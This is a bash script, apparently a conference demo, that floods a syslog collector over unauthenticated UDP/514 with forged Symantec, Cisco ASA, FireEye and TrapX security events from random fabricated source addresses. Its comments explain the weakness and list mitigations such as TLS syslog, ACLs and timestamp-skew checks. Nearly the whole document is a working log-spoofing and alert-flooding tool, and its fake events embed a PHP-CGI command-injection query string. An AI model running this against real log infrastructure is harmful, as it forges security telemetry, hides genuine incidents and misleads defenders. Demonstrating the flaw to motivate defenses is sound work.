
Syslog Spoof - GrrCON Demo - Charles Herring

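#!/bin/bash
# Demo from the GrrCON talk: floods a syslog collector with fabricated events
# from random "attacker" addresses for 10 seconds.
#
# What it demonstrates: plain UDP syslog on port 514 carries no sender
# authentication, so a collector accepts whatever arrives and the SIEM
# behind it will alert on these events as if they were real. Mitigations
# on the receiving side are syslog over TLS with client certificates
# (RFC 5425) or, at minimum, collector/firewall ACLs that only admit the
# expected forwarder addresses.
#
# Requires: GNU date (for `-d '8 hours ago'`) and a netcat that accepts
# `-u -w 0`. The `-w 0` idle-timeout semantics differ between netcat
# implementations; confirm against the installed nc.
#
# Fixes vs. the original paste:
#   - the summary line passed $COUNTER/$LIES inside the printf FORMAT string
#     (SC2059); they are now `%s` arguments.
#   - messages are emitted with `printf '%s'` instead of `echo -n`, which
#     keeps the backslashes and `%22` sequences in the payloads literal
#     regardless of echo/xpg_echo settings.
#   - aborts early if nc is missing instead of "sending" for 10 seconds
#     into nothing.

command -v nc >/dev/null 2>&1 || { printf 'nc not found in PATH\n' >&2; exit 1; }

# All spoofed events are stamped 8 hours in the past. Note for defenders:
# a large, constant skew between event time and receive time is one
# property a collector can use to flag injected messages.
timestamp_short=$(date -d '8 hours ago' +"%b %d %T")
timestamp_medium=$(date -d '8 hours ago' +"%b %d %Y %T")
timestamp_long=$(date -d '8 hours ago' +"%B %d %Y %T")
streamerip=172.31.4.37

# send_msg MESSAGE — ship one raw syslog line to the collector over UDP/514.
# The payload is passed as a %s argument, never as the format string.
send_msg() {
  printf '%s' "$1" | nc -u -w 0 "${streamerip}" 514
}

printf "Spoofing messages as fast as possible for 10 seconds .\n"
COUNTER=0
end=$((SECONDS+10))
LIES=0
while (( SECONDS < end )); do
  # One random 10.x.y.z "attacker" per iteration; every message in the
  # iteration names it as the source.
  attacker="10.$(( ( RANDOM % 254 )  + 1 )).$(( ( RANDOM % 254 )  + 1 )).$(( ( RANDOM % 254 )  + 1 ))"
  # Symantec Endpoint Protection style IPS event.
  send_msg "<50>${timestamp_short} acmesep SymantecServer: ACMELAPTOP143,[SID: 26825] Web Attack: Plesk Command Injection attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\SKYPE\PHONE\SKYPE.EXE,Local: ${attacker},Local: 000000000000,Remote: ,Remote: 192.168.1.5,Remote: 000000000000,Inbound,TCP,Intrusion ID: 0,Begin: 2018-01-09 11:31:27,End: 2018-01-09 11:31:27,Occurrences: 1,Application: C:/PROGRAM FILES (X86)/SKYPE/PHONE/SKYPE.EXE,Location: Default,User: jdoe,Domain: ADLOCAL,Local Port 80,Remote Port 53590,CIDS Signature ID: 26825,CIDS Signature string: Web Attack: Plesk Command Injection,CIDS Signature SubID: 72137,Intrusion URL: localhost/phppath/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=%22%22+-d+max_execution_time=0+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n,Intrusion Payload URL:"
  # Cisco ASA style deny.
  send_msg "<162>${timestamp_medium}: %ASA-2-106006: Deny inbound UDP from ${attacker}/15407 to 192.168.1.5/5060 on interface outside"
  # FireEye eMPS CEF alert.
  send_msg "<161>fenotify-2587809.alert: CEF:0|FireEye|eMPS|8.0.2.682549|MO|malware-object|4|rt=${timestamp_short} UTC cn2Label=sid cn2=88970333 request=hxxps://capitanes.org.ar/document.htm act=notified dvchost=COSFireEyeEX.acme.com cs4Label=link cs4=https://192.168.1.5/emps/eanalysis?e_id\=5412033&type\=url&lms_iden\=0C:C4:7A:DA:FB:D6 duser=jdoe@acme.com cn1Label=vlan cn1=0 externalId=2587809 dvc=${attacker} suser=badguy@evil.com msg=DM2PR11MB0335C8A2D6B4EDF150793468D9100@evil.prod.outlook.com cs1Label=sname cs1=Phish.LIVE.DTI.URL start=Jan 09 2018 15:59:22 UTC cat=retro-detection devicePayloadId=2e8dd72f-97a8-4863-baab-805ead82feee fileType=exe flexString2Label=subject flexString2=[EXTERNAL] Invoices for approval"
  # TrapX TSOC CEF network-scan event.
  send_msg "<81>${timestamp_long} 127.0.1.1 CEF:0|TrapX|TSOC|6.0|ID:3|Intelligence Event - Network Scan Detected|4|rt=${timestamp_short} src=${attacker} deviceNtDomain=AcmedTrapxApp001_NIS dpt=256 cs5Label=company cs5=N.America proto=TCP deviceExternalId=279 dst=192.168.1.5 spt=45774 cat=Network Scan Detected devicePayloadId=NO externalId=11671827"
  COUNTER=$((COUNTER + 4))   # four messages per iteration
  LIES=$((LIES + 1))         # one fabricated source address per iteration
done
printf '%s spoofed messages sent concerning %s spoofed IP \n' "$COUNTER" "$LIES"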